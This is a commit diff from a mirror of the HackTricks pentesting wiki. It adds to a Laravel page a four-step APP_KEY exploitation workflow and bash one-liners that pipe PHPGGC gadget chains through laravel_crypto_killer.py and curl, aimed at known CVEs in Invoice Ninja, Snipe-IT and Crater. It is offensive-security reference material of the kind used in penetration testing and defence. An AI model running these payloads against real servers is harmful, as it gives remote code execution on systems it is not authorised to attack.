mirror of
https://github.com/HackTricks-wiki/hacktricks.git
synced 2025-10-10 18:36:50 +00:00
Merge pull request #1219 from HackTricks-wiki/update_Laravel__APP_KEY_Leakage_Analysis_20250731_124055
Laravel APP_KEY Leakage Analysis
This commit is contained in:
commit
af03f5d540
@ -64,10 +64,30 @@ The script transparently supports both CBC and GCM payloads and re-generates the
|
||||
| Crater (CVE-2024-55556) | `SESSION_DRIVER=cookie` → `laravel_session` cookie | Laravel/RCE15 |
|
||||
|
||||
The exploitation workflow is always:
|
||||
1. Obtain `APP_KEY` (default examples, Git leak, config/.env leak, or brute-force)
|
||||
2. Generate gadget with **PHPGGC**
|
||||
3. `laravel_crypto_killer.py encrypt …`
|
||||
4. Deliver payload through the vulnerable parameter/cookie → **RCE**
|
||||
1. Obtain or brute-force the 32-byte `APP_KEY`.
|
||||
2. Build a gadget chain with **PHPGGC** (for example `Laravel/RCE13`, `Laravel/RCE9` or `Laravel/RCE15`).
|
||||
3. Encrypt the serialized gadget with **laravel_crypto_killer.py** and the recovered `APP_KEY`.
|
||||
4. Deliver the ciphertext to the vulnerable `decrypt()` sink (route parameter, cookie, session …) to trigger **RCE**.
|
||||
|
||||
Below are concise one-liners demonstrating the full attack path for each real-world CVE mentioned above:
|
||||
|
||||
```bash
|
||||
# Invoice Ninja ≤5 – /route/{hash}
|
||||
php8.2 phpggc Laravel/RCE13 system id -b -f | \
|
||||
./laravel_crypto_killer.py encrypt -k <APP_KEY> -v - | \
|
||||
xargs -I% curl "https://victim/route/%"
|
||||
|
||||
# Snipe-IT ≤6 – XSRF-TOKEN cookie
|
||||
php7.4 phpggc Laravel/RCE9 system id -b | \
|
||||
./laravel_crypto_killer.py encrypt -k <APP_KEY> -v - > xsrf.txt
|
||||
curl -H "Cookie: XSRF-TOKEN=$(cat xsrf.txt)" https://victim/login
|
||||
|
||||
# Crater – cookie-based session
|
||||
php8.2 phpggc Laravel/RCE15 system id -b > payload.bin
|
||||
./laravel_crypto_killer.py encrypt -k <APP_KEY> -v payload.bin --session_cookie=<orig_hash> > forged.txt
|
||||
curl -H "Cookie: laravel_session=<orig>; <cookie_name>=$(cat forged.txt)" https://victim/login
|
||||
```
|
||||
|
||||
|
||||
---
|
||||
|
||||
@ -180,7 +200,8 @@ Another deserialization: [https://github.com/ambionics/laravel-exploits](https:/
|
||||
|
||||
|
||||
## References
|
||||
* [Laravel: APP_KEY leakage analysis](https://www.synacktiv.com/publications/laravel-appkey-leakage-analysis.html)
|
||||
* [Laravel: APP_KEY leakage analysis (EN)](https://www.synacktiv.com/publications/laravel-appkey-leakage-analysis.html)
|
||||
* [Laravel : analyse de fuite d’APP_KEY (FR)](https://www.synacktiv.com/publications/laravel-analyse-de-fuite-dappkey.html)
|
||||
* [laravel-crypto-killer](https://github.com/synacktiv/laravel-crypto-killer)
|
||||
* [PHPGGC – PHP Generic Gadget Chains](https://github.com/ambionics/phpggc)
|
||||
* [CVE-2018-15133 write-up (WithSecure)](https://labs.withsecure.com/archive/laravel-cookie-forgery-decryption-and-rce)
|
||||
|
Loading…
x
Reference in New Issue
Block a user